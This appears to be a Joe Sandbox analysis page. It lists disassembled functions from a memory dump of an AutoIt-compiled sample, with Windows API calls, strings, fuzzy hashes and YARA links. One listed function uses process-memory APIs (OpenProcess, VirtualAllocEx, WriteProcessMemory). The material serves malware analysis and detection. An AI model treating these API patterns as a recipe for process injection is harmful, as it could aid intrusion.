Opcode ID: 87e7422acbfa78fe99b5f2a0ae482755ae74efe98f4185bb797f79d85ff18316
Instruction ID: 52442a5187f0c9064384edc8981866e4759ddbd522276359683a9c671f8822ec
Opcode Fuzzy Hash: 87e7422acbfa78fe99b5f2a0ae482755ae74efe98f4185bb797f79d85ff18316
Instruction Fuzzy Hash: 91A153756042059FCB02DF14C885E6ABBE9FF89314F05899DF8999B3A2CB31EC45CB91

Function 003BB2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 003BB4BE

Strings

AutoIt3GUI, xrefs: 003BB436
Container, xrefs: 003BB43B
%?, xrefs: 003BB561

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%?
API String ID: 3565006973-1141368171
Opcode ID: d6bb71ee697d80dd0e9168cefe1c042c89ea659c0a5612e4db6ffd7529d060aa
Instruction ID: 3b7ecbe60d3ceba10490633bc9dace6c25e3e331ebd2bf94a43c3b36a7a401f9
Opcode Fuzzy Hash: d6bb71ee697d80dd0e9168cefe1c042c89ea659c0a5612e4db6ffd7529d060aa
Instruction Fuzzy Hash: 37915D706006019FDB25DF64C884BAAB7F9FF49714F10856EFA4ACB691DBB0E845CB50

Function 0038501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 003850AD

Part of subcall function 003900F0: __87except.LIBCMT ref: 0039012B

Strings

pow, xrefs: 00385085, 003850A2

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: f4a3f382d813fb2e39639ed687f5a7d1546eecae13f594c0b460be40bef1b12c
Instruction ID: d1310af86ccc8edf35f1cb9d3bfe593d392d87145e4919a1a835a9c86e09be13
Opcode Fuzzy Hash: f4a3f382d813fb2e39639ed687f5a7d1546eecae13f594c0b460be40bef1b12c
Instruction Fuzzy Hash: D9516DA590C7028ADF1B7B28CD4537E3BA89B40700F218DD9E4D58A2A9DF348DD4DB86

Function 003A8584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003A862B
_memmove.LIBCMT ref: 003A8685

Strings

_7, xrefs: 003A86FF, 003ADFDC, 003ADFF8
3c7, xrefs: 003A860C

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _memmove
String ID: 3c7$_7
API String ID: 4104443479-4188345352
Opcode ID: 93c5ba728ecbd03d4ccd13f24ec226b4c43d3f34187238ea43a0bd30561442e9
Instruction ID: a38e27e558d97082891e8bdddb7d811c8dfc8a9dfd22c95de50022ca9dc5f7a7
Opcode Fuzzy Hash: 93c5ba728ecbd03d4ccd13f24ec226b4c43d3f34187238ea43a0bd30561442e9
Instruction Fuzzy Hash: 21518D70D00609DFCB26CF68C884AAEBBB1FF46304F158529E85AE7650EB30A955CF51

Function 003B97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003C14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003B9296,?,?,00000034,00000800,?,00000034), ref: 003C14E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 003B983F

Part of subcall function 003C1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003B92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 003C14B1

Part of subcall function 003C13DE: GetWindowThreadProcessId.USER32(?,?), ref: 003C1409
Part of subcall function 003C13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,003B925A,00000034,?,?,00001004,00000000,00000000), ref: 003C1419
Part of subcall function 003C13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,003B925A,00000034,?,?,00001004,00000000,00000000), ref: 003C142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003B98AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003B98F9

Strings

@, xrefs: 003B9911

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: cdf5629b3c612170638ca3fb86d11d6c6ad20cf9703339c09c62ae78d2dde226
Instruction ID: 8fc99c374fd8045e18211fe96fef7031ad4f7338a21c27b041e13541089314d0
Opcode Fuzzy Hash: cdf5629b3c612170638ca3fb86d11d6c6ad20cf9703339c09c62ae78d2dde226
Instruction Fuzzy Hash: C3413076900118BFDB15DFA4CC85FDEBBB8EB09300F004199FA45BB191DA716E45DBA0

Function 003E7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003EF910,00000000,?,?,?,?), ref: 003E79DF
GetWindowLongW.USER32 ref: 003E79FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 003E7A0C

Strings

SysTreeView32, xrefs: 003E79B1

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 03df1d3d4832c33776beb92756758bf3ac81c7e417196bca2fc89ebc95d7ec17
Instruction ID: 62ff8cd1a161ac8653f54bfada8214142949df2c7dccc6e7e53ddc963a16d6da
Opcode Fuzzy Hash: 03df1d3d4832c33776beb92756758bf3ac81c7e417196bca2fc89ebc95d7ec17
Instruction Fuzzy Hash: 3D31FC3120465AAFDB228E39CC41BEB77A9EF49324F218725F875A72E1D730EC508B50

Function 003E73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003E7461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003E7475
SendMessageW.USER32(?,00001002,00000000,?), ref: 003E7499

Strings

SysMonthCal32, xrefs: 003E742C

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: fce8a823c14b72c6d5555bb28ba76d24aa893a859eb02f5e915112cd8a6dc335
Instruction ID: d8fa18e74133994fdb98ea3895a8cfb5e8d4aecfa3decc62c6f3407bb906be4c
Opcode Fuzzy Hash: fce8a823c14b72c6d5555bb28ba76d24aa893a859eb02f5e915112cd8a6dc335
Instruction Fuzzy Hash: 95219132500268AFDF228E55CC46FEA3B69EF48724F110214FE156B1D0DAB5AC919BA0

Function 003E7B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003E7C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003E7C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003E7C5F

Strings

msctls_updown32, xrefs: 003E7BC4

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: d02d331da6f164282f8b3fc923d874f01066502f6e40d9a2a5bc5ab5f35a2f02
Instruction ID: 4f60e0127528c0729cdc4ea582ea03d11262ccb97b9a31a321b5ee64840913ef
Opcode Fuzzy Hash: d02d331da6f164282f8b3fc923d874f01066502f6e40d9a2a5bc5ab5f35a2f02
Instruction Fuzzy Hash: B7219CB1204259AFDB22DF24DCC1DA737ACEB4A394B150159F9019B3A1CB71EC118A60

Function 003E6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003E6D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003E6D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003E6D70

Strings

Listbox, xrefs: 003E6D08

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: f479828a492b402016140b637e49f85fa59392383073b40db8a20a2b0a73a48c
Instruction ID: c25ae76c78a5fcaebe6fcf98afad806ea5246afbb54ed5bff4b31b840ae7ec97
Opcode Fuzzy Hash: f479828a492b402016140b637e49f85fa59392383073b40db8a20a2b0a73a48c
Instruction Fuzzy Hash: 66218332600168BFDF228F55CC45FBB37AAEF997A0F518224F9455B1D1C6719C5187A0

Function 003D39E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 003D3A66

Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22

Strings

, $, xrefs: 003D3AA6
%?, xrefs: 003D39F4
AUTOITCALLVARIABLE%d, xrefs: 003D3A58

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d$%?
API String ID: 3506404897-1727123861
Opcode ID: b077433487cbfdba5b7139745364edee5110b9defc4834bacf3bc0166b148f7d
Instruction ID: b3d51eee7e8d1ccd8fee0688ad858e30f9e03d16d84bf90d6310dd3799062ab9
Opcode Fuzzy Hash: b077433487cbfdba5b7139745364edee5110b9defc4834bacf3bc0166b148f7d
Instruction Fuzzy Hash: 6C219372B00219AFCF12EF64DC82AEE77B5AF44300F50445AF545AB286DB74EE41CB66

Function 003E770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003E7772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003E7787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003E7794

Strings

msctls_trackbar32, xrefs: 003E7749

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: fd1e4986c4099553fbabeecd051fe70b7b14bd50e186d88471b8d70858694780
Instruction ID: 83c3e37bded4ad23f741d3ee9c85be24492b3b7552a1d423e608d1af19ab3036
Opcode Fuzzy Hash: fd1e4986c4099553fbabeecd051fe70b7b14bd50e186d88471b8d70858694780
Instruction Fuzzy Hash: BE113A72244248BFEF215F61CC01FE7776CEF89B54F124228F641A60D0C272E851CB10

Function 00386B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00386B93
__calloc_crt.LIBCMT ref: 00386BAC

Strings

@BB, xrefs: 00386BC3
A, xrefs: 00386BD1

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: __calloc_crt
String ID: A$@BB
API String ID: 3494438863-782587721
Opcode ID: 988ea72d25ffb9fbe6afc579e9f8a4ce76d9a0d705a65495cd2e4abe635a296f
Instruction ID: bc02692332c5bc6255f6f44652f87d09d2bfbfe4fef34e0322f75b65a7704740
Opcode Fuzzy Hash: 988ea72d25ffb9fbe6afc579e9f8a4ce76d9a0d705a65495cd2e4abe635a296f
Instruction Fuzzy Hash: 3FF0A475304712CBE737AF16BC52AA22795E700338F9000A6E500CE1C0EB3488824B98

Function 003A1935 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 003A1775

Part of subcall function 003DBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,003A195E,?), ref: 003DBFFE
Part of subcall function 003DBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 003DC010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 003A196D

Strings

WIN_XPe, xrefs: 003A1788
8], xrefs: 003A1935

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: 8]$WIN_XPe
API String ID: 582185067-2696490331
Opcode ID: 51288a6b098ac58857904c098e7daf878c8ce6310a3f3bde82dd3f85f7db5b3d
Instruction ID: 4d4d90395e2818c632199c0688090993c9bf0f229018270359951952774a008e
Opcode Fuzzy Hash: 51288a6b098ac58857904c098e7daf878c8ce6310a3f3bde82dd3f85f7db5b3d
Instruction Fuzzy Hash: 3DF0C971800109DFDB27DB91CA84AECBBFCEB09301F552095E142A6590D7724F85DF64

Function 00389B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 00389B94

Part of subcall function 00389C0B: __mtinitlocknum.LIBCMT ref: 00389C1D
Part of subcall function 00389C0B: EnterCriticalSection.KERNEL32(00000000,?,00389A7C,0000000D), ref: 00389C36

__updatetlocinfoEx_nolock.LIBCMT ref: 00389BA4

Part of subcall function 00389100: ___addlocaleref.LIBCMT ref: 0038911C
Part of subcall function 00389100: ___removelocaleref.LIBCMT ref: 00389127
Part of subcall function 00389100: ___freetlocinfo.LIBCMT ref: 0038913B

Strings

8A, xrefs: 00389B8A, 00389B9F, 00389BAB
8A, xrefs: 00389B85

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
String ID: 8A$8A
API String ID: 547918592-441909865
Opcode ID: 19a88e42b1ab8b896635e6aa6b53cd8e3c0e69192d23999425ec9bf3baff86fc
Instruction ID: 8306589bb07c6e58d7d099d9fb76362ef3b2cff88125ea0e9f969e2f0af86406
Opcode Fuzzy Hash: 19a88e42b1ab8b896635e6aa6b53cd8e3c0e69192d23999425ec9bf3baff86fc
Instruction Fuzzy Hash: CBE0863954B300A5D613F7A5AA077A866505B00B21F6441DBF445590C1CE781540871F

Function 00364C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00364B83,?), ref: 00364C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00364C56

Strings

kernel32.dll, xrefs: 00364C3F
Wow64RevertWow64FsRedirection, xrefs: 00364C50

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: f4236449bf2477f572d6ee0fe1ca7561fe0d2d262b9163173be41d6895b05407
Instruction ID: dc7cb42b9083b1a2b37b22af9957d13d25aa819f27534e198be95f72e85fe3e5
Opcode Fuzzy Hash: f4236449bf2477f572d6ee0fe1ca7561fe0d2d262b9163173be41d6895b05407
Instruction Fuzzy Hash: 79D05B30910723DFD7355F31D94864677D9AF05351F11C93ED496DA2A4E7B4D4C0C650

Function 00364C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00364BD0,?,00364DEF,?,004252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00364C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00364C23

Strings

kernel32.dll, xrefs: 00364C0C
Wow64DisableWow64FsRedirection, xrefs: 00364C1D

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 97008a653b51b185932be2a196bb503862c0f4fbcfdfae59fe205e6ace80249f
Instruction ID: fd8fcbb23a8e2709afa77a29285a4c4be43e9f948906a483dcb83b74d4511fba
Opcode Fuzzy Hash: 97008a653b51b185932be2a196bb503862c0f4fbcfdfae59fe205e6ace80249f
Instruction Fuzzy Hash: A0D01230911713DFD7216F71D948647B6DAEF09351F11CD3ED486DA2A4E6F4D480C654

Function 003E0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,003E1039), ref: 003E0DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003E0E07

Strings

advapi32.dll, xrefs: 003E0DF0
RegDeleteKeyExW, xrefs: 003E0E01

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 7ef443137ae57e50f7884acb28757ef2a926965c57914b5ddc21276dc6a48508
Instruction ID: abbb3468989213447fc16c44979599b77f6d1762a88838d0363605829d5e4271
Opcode Fuzzy Hash: 7ef443137ae57e50f7884acb28757ef2a926965c57914b5ddc21276dc6a48508
Instruction Fuzzy Hash: 87D0C231400B26DFC3224FB1C848382B2DAAF40341F118D3ED486D6190D7F4D8D0C604

Function 003D90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,003D8CF4,?,003EF910), ref: 003D90EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003D9100

Strings

kernel32.dll, xrefs: 003D90E9
GetModuleHandleExW, xrefs: 003D90FA

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 29206296b4b67380f91501006844953e566fec64170d2fc8382bb357a4742173
